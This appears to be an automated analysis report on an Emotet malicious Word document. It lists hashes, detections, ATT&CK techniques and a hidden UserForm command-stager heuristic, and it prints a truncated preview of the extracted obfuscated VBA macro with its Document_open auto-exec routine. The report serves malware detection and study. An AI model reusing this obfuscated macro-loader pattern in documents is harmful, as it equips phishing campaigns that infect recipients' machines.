Emotet Office (OLE) malware analysis — malicious · 02f25c2096bb8cb8

MALICIOUS

Office (OLE)

100.3 KB Created: 2019-12-19 05:44:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: f969b036b9dad25304d94e548c8fc96f SHA-1: 81b6f487e9770a185fa515c17a937764c980781e SHA-256: 02f25c2096bb8cb8fd739f680af0fe3e4bcf9c9abfce948fc3765efe398cce10

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a VBA macro with a Document_Open auto-execution routine. Critical heuristics indicate a hidden UserForm command stager, which is a known technique used by Emotet for downloading and executing further payloads. ClamAV detection also explicitly names Emotet. The macro's obfuscated nature and use of CreateObject and GetObject point towards malicious intent.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7465219-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7465219-1
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13375 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13375 bytes
SHA-256: `70c9e577179092f152d1f2a83d4d0e0d1f1699c1cc3c65251ba373a4034c59bd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Yjxdjuqww" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Izmjwhnzzja, 0, 0, MSForms, TextBox" Private Sub Document_open() Ewlqnnbaw = "Kristina" Dim Xiuukcxvkunwm As String Dim Dmduclsljli As String Iqduexwkos = ("Dolor.") Dim Wipnqzycxjoxb As Double Dim Fwljbbmnuq As String Dim Pqfouvxgdcys As Integer Ynybgsdkrn = Gvjvuxxhjl Dim Ubeujcysxrdy As Boolean Kapeyrlkpcwi = ("Minnie") Dim Veamwchf As Double Dim Bppklorlgb As Boolean Dim Remzjjlcxbuxx As Double Qcllemgdjca = "Et." Dim Klbfoymv As Boolean Dim Txullavsnrybi As String Dim Ijlbdxjkksm As Boolean Jyguqgsokau = ("Distinctio minus facilis.") Dim Kmhcichpfpb As Integer Yjnktzahipkdl = 914 Bxiqxpnw = Jjrydjfat Bahvcgbxwz = 21 Verzkblyn Nkfdxwjyg = "Nulla non dignissimos eum rerum accusamus ducimus sit omnis maxime." Dim Xhkcyzvzloi As Boolean Dim Iqdmazbm As Integer Rlsdacbec = ("Laboriosam quos libero quam in temporibus placeat.") Dim Apzwfpfmfsfn As Boolean Dim Gswxhzcoatrf As String Dim Wjjgxihbepuk As Boolean Dnmynitjeguzp = Gfzskpvjypw Dim Ogdxdclmg As Boolean Ocneclytwnxk = ("Beatae.") Dim Lkieniqvovxd As Integer Dim Nabzmhehcqgnr As Double Dim Rqwifssdisk As Double Nrhznbfvlxxn = "Voluptate et consectetur." Dim Hrxzrmfw As Boolean Dim Vrdvxthc As Integer Dim Ukjhzpxuft As Integer Toklktspmqng = ("Distinctio.") Dim Xkysqviajxhqa As Boolean Krlcaypklin = 723 Zdwdddrnvnc = Sfmetsqabz Dxizmjcm = 25 End Sub Attribute VB_Name = "Kvekxrandg" Attribute VB_Base = "0{CC76A9E4-8F36-43E6-BEEA-3A679F9EBA9D}{DDC7A40E-2166-4113-8489-BD679C79F6E9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Oatfkhwijuwp" Function Ysesnyrslmjpz() Empanmxxg = "Perspiciatis laboriosam cupiditate." Dim Ubxbzmniki As Double Dim Vkrexhlu As Boolean Iniqirmtfwug = ("Mack") Dim Bnhzdibx As Boolean Dim Upviapvcrc As Boolean Dim Tjdvvqchjo As String Djalqjplmzv = Dtqbrpnjquxvi Dim Utygvgfroj As String Mhxtnkyrx = ("Guy") Dim Sygfmodpi As Boolean Dim Rsapyqycc As Integer Dim Ibcsajlkv As Boolean Ogioascku = "Velit voluptatem." Dim Hqftymitvk As Integer Dim Pedtoteybr As Boolean Dim Thjpfzrx As String Tlnhlybbsyats = ("Et consectetur ducimus rem itaque laboriosam fugiat fugit.") Dim Zorqfkqgbzqdt As Integer Sqkslrgghfwz = 707 Dzozsglahx = Flhuviox Jayfthjkik = 833 Yxgygfrfhlacg = Yjxdjuqww.Izmjwhnzzja Tktovuwtcstj = "Dolore." Dim Ospimpxr As String Dim Sqbhoxfxmqu As Boolean Ejgpebfjwtqe = ("Eaque accusantium est.") Dim Dfcvcrdweso As String Dim Nvwhjvxk As Integer Dim Atqnfvxld As Double Brkusbrien = Wroalhipcdacc Dim Xahhletl As Boolean Nrtgcvratt = ("At sed sapiente explicabo.") Dim Vmeukhxrisgx As Integer Dim Xfoucgkoy As String Dim Jaiibisigfv As Integer Tmnleulwmux = "Est dicta quia." Dim Zqpghnofbh As Double Dim Gjnondccya As String Dim Ykdeswflwqjc As Integer Xhplseycxlxhz = ("Beatrice") Dim Jmyzwiwkkmfbd As Double Alvnfumnimu = 126 Sglwopmdkc = Bwfymcupilm Mawzqmclks = 62 Ospufpjm = Yxgygfrfhlacg + Kvekxrandg.Tolxoiunzpcdn + Kvekxrandg.Qhtqoquxzoo + Kvekxrandg.Rzmvgfayscp Utlatynpak = "Labore." Dim Uedfdozkfyuj As Double Dim Chkmyzrperol As Double Fqqdzmyornptl = ("Nemo.") Dim Wycpbwffn As String Dim Ceamqsaceohr As Double Dim Uopwxfokihsmv As Double Aldrfjto = Wsjcspgsrhipj Dim Frvstexnb As Boolean Eaeoazkz = ("Vero excepturi.") Dim Fiqsludftk As Boolean Dim Lzsyvlszfh As String Dim Kgndgiekpta As Integer Aikthiubr = "Quia velit enim eligendi at libero dolorem et minima." Dim Vcezgahxk As Double Dim Fhzzkfrxr As String Dim Svdifxzdnt As String Ieefdoldy = ("Guadalupe") Dim Cduixojuxhmj As String Yukyhooozqvga = 469 Fulpcaflo = Eytawuviftb ... (truncated)

SHA-256: 70c9e577179092f152d1f2a83d4d0e0d1f1699c1cc3c65251ba373a4034c59bd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Yjxdjuqww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Izmjwhnzzja, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ewlqnnbaw = "Kristina"
Dim Xiuukcxvkunwm As String
Dim Dmduclsljli As String
Iqduexwkos = ("Dolor.")
Dim Wipnqzycxjoxb As Double
Dim Fwljbbmnuq As String
Dim Pqfouvxgdcys As Integer
Ynybgsdkrn = Gvjvuxxhjl
Dim Ubeujcysxrdy As Boolean
Kapeyrlkpcwi = ("Minnie")
Dim Veamwchf As Double
Dim Bppklorlgb As Boolean
Dim Remzjjlcxbuxx As Double
Qcllemgdjca = "Et."
Dim Klbfoymv As Boolean
Dim Txullavsnrybi As String
Dim Ijlbdxjkksm As Boolean
Jyguqgsokau = ("Distinctio minus facilis.")
Dim Kmhcichpfpb As Integer
Yjnktzahipkdl = 914
Bxiqxpnw = Jjrydjfat
Bahvcgbxwz = 21
Verzkblyn
   Nkfdxwjyg = "Nulla non dignissimos eum rerum accusamus ducimus sit omnis maxime."
Dim Xhkcyzvzloi As Boolean
Dim Iqdmazbm As Integer
Rlsdacbec = ("Laboriosam quos libero quam in temporibus placeat.")
Dim Apzwfpfmfsfn As Boolean
Dim Gswxhzcoatrf As String
Dim Wjjgxihbepuk As Boolean
Dnmynitjeguzp = Gfzskpvjypw
Dim Ogdxdclmg As Boolean
Ocneclytwnxk = ("Beatae.")
Dim Lkieniqvovxd As Integer
Dim Nabzmhehcqgnr As Double
Dim Rqwifssdisk As Double
Nrhznbfvlxxn = "Voluptate et consectetur."
Dim Hrxzrmfw As Boolean
Dim Vrdvxthc As Integer
Dim Ukjhzpxuft As Integer
Toklktspmqng = ("Distinctio.")
Dim Xkysqviajxhqa As Boolean
Krlcaypklin = 723
Zdwdddrnvnc = Sfmetsqabz
Dxizmjcm = 25
End Sub

Attribute VB_Name = "Kvekxrandg"
Attribute VB_Base = "0{CC76A9E4-8F36-43E6-BEEA-3A679F9EBA9D}{DDC7A40E-2166-4113-8489-BD679C79F6E9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Oatfkhwijuwp"
Function Ysesnyrslmjpz()
   Empanmxxg = "Perspiciatis laboriosam cupiditate."
Dim Ubxbzmniki As Double
Dim Vkrexhlu As Boolean
Iniqirmtfwug = ("Mack")
Dim Bnhzdibx As Boolean
Dim Upviapvcrc As Boolean
Dim Tjdvvqchjo As String
Djalqjplmzv = Dtqbrpnjquxvi
Dim Utygvgfroj As String
Mhxtnkyrx = ("Guy")
Dim Sygfmodpi As Boolean
Dim Rsapyqycc As Integer
Dim Ibcsajlkv As Boolean
Ogioascku = "Velit voluptatem."
Dim Hqftymitvk As Integer
Dim Pedtoteybr As Boolean
Dim Thjpfzrx As String
Tlnhlybbsyats = ("Et consectetur ducimus rem itaque laboriosam fugiat fugit.")
Dim Zorqfkqgbzqdt As Integer
Sqkslrgghfwz = 707
Dzozsglahx = Flhuviox
Jayfthjkik = 833
Yxgygfrfhlacg = Yjxdjuqww.Izmjwhnzzja
   Tktovuwtcstj = "Dolore."
Dim Ospimpxr As String
Dim Sqbhoxfxmqu As Boolean
Ejgpebfjwtqe = ("Eaque accusantium est.")
Dim Dfcvcrdweso As String
Dim Nvwhjvxk As Integer
Dim Atqnfvxld As Double
Brkusbrien = Wroalhipcdacc
Dim Xahhletl As Boolean
Nrtgcvratt = ("At sed sapiente explicabo.")
Dim Vmeukhxrisgx As Integer
Dim Xfoucgkoy As String
Dim Jaiibisigfv As Integer
Tmnleulwmux = "Est dicta quia."
Dim Zqpghnofbh As Double
Dim Gjnondccya As String
Dim Ykdeswflwqjc As Integer
Xhplseycxlxhz = ("Beatrice")
Dim Jmyzwiwkkmfbd As Double
Alvnfumnimu = 126
Sglwopmdkc = Bwfymcupilm
Mawzqmclks = 62
Ospufpjm = Yxgygfrfhlacg + Kvekxrandg.Tolxoiunzpcdn + Kvekxrandg.Qhtqoquxzoo + Kvekxrandg.Rzmvgfayscp
   Utlatynpak = "Labore."
Dim Uedfdozkfyuj As Double
Dim Chkmyzrperol As Double
Fqqdzmyornptl = ("Nemo.")
Dim Wycpbwffn As String
Dim Ceamqsaceohr As Double
Dim Uopwxfokihsmv As Double
Aldrfjto = Wsjcspgsrhipj
Dim Frvstexnb As Boolean
Eaeoazkz = ("Vero excepturi.")
Dim Fiqsludftk As Boolean
Dim Lzsyvlszfh As String
Dim Kgndgiekpta As Integer
Aikthiubr = "Quia velit enim eligendi at libero dolorem et minima."
Dim Vcezgahxk As Double
Dim Fhzzkfrxr As String
Dim Svdifxzdnt As String
Ieefdoldy = ("Guadalupe")
Dim Cduixojuxhmj As String
Yukyhooozqvga = 469
Fulpcaflo = Eytawuviftb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.